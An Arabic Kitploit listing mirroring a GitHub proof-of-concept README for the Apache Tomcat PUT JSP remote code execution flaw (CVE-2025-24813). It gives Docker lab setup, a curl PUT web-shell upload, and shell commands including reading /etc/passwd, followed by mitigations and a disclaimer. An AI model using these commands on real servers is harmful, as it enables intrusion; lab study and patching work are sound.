Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24813 — Apache Tomcat PUT JSP RCE - CVE-2025-24813 - استغلال و PoC | Kitploit
أدوات/GitHubGitHub/shivshantp/cve-2025-24813
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرتطوير الحمولاتمختبرات وتدريب عملي
GitHubshivshantp/cve-2025-24813

CVE-2025-24813

Apache Tomcat PUT JSP RCE - CVE-2025-24813 - استغلال و PoC

عرض المستودع
58منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2025-24813 – استغلال RCE عبر PUT JSP في Apache Tomcat

CVE Exploit-Status Platform Language Dockerized License

يحتوي هذا المستودع على إثبات مفهوم كامل (PoC) لـ CVE-2025-24813، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في Apache Tomcat باستخدام طريقة HTTP PUT لنشر شل ويب JSP خبيثة.

🔥 يوضح هذا الاستغلال كيف يمكن للمهاجم تحقيق RCE عبر تحميل الملفات وتنفيذ الحمولة في مثيلات Tomcat غير المؤمنة بشكل صحيح.


📁 هيكل المشروع

root@kitploit:~
CVE-2025-24813/
├── docker/                         
│   ├── Dockerfile
│   └── web.xml                    
├── exploit/                        
│   ├── 1_exploit_cve_2025_24813.py
│   └── shell.jsp
├── screenshots/                    
│   ├── 1_tomcat_running.png
│   ├── 2_docker_started.png
│   ├── 3_upload_shell.png
│   ├── 4_run_python_exploit.png
│   ├── 5_access_shell_whoami.png
│   ├── 6_view_etc_passwd.png
│   ├── 7_run_uname.png
│   ├── 8_run_id.png
│   └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md

🚀 خطوات الاستغلال

1️⃣ إعداد بيئة Docker

root@kitploit:~
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat

📸 Tomcat قيد التشغيل
📸 Docker بدأ


2️⃣ تحميل شل JSP خبيثة

root@kitploit:~
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp

📸 تحميل JSP


3️⃣ تشغيل استغلال Python

root@kitploit:~
python3 exploit/1_exploit_cve_2025_24813.py

📸 تشغيل الاستغلال


4️⃣ التفاعل مع شل الويب

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd

📸 whoami
📸 passwd
📸 uname
📸 id
📸 pwd


🧩 الميزات

  • 🔧 إعداد قائم على Docker لخادم Apache Tomcat ضعيف
  • 📥 إساءة استخدام طريقة PUT لتحميل وتشغيل شل ويب JSP
  • 🐍 نص PoC مبني على Python
  • 📸 دليل كامل يعتمد على لقطات الشاشة
  • 📚 مثالي لمحاكاة الفريق الأحمر والتعليم

🛠️ كيفية التصحيح (التخفيف)

  • 🚫 تعطيل طرق PUT/DELETE في web.xml أو تهيئة الخادم
  • ⛓️ استخدام مدير أمان أو تحكمات أكثر صرامة في حاوية servlet
  • 🔐 تطبيق مرشحات التحقق من تحميل الملفات على مستوى الملف
  • 🧱 إعداد WAF لحظر طلبات PUT غير المصرح بها
  • ✅ الترقية إلى إصدار آمن ومصحح من Apache Tomcat

⚠️ إخلاء مسؤولية

هذا المشروع هو لأغراض تعليمية وبحثية فقط. الاختبار أو الاستغلال أو الاستخدام غير المصرح به للأنظمة التي لا تملكها أو ليس لديك إذن لاختبارها يعد غير قانوني وغير أخلاقي.


👨‍💻 المؤلف

Shivshant Patil
مخترق أخلاقي معتمد (CEH v13)
خريج بكالوريوس تكنولوجيا في هندسة الحاسوب
🔗 LinkedIn
🔗 GitHub


تنزيل الأداة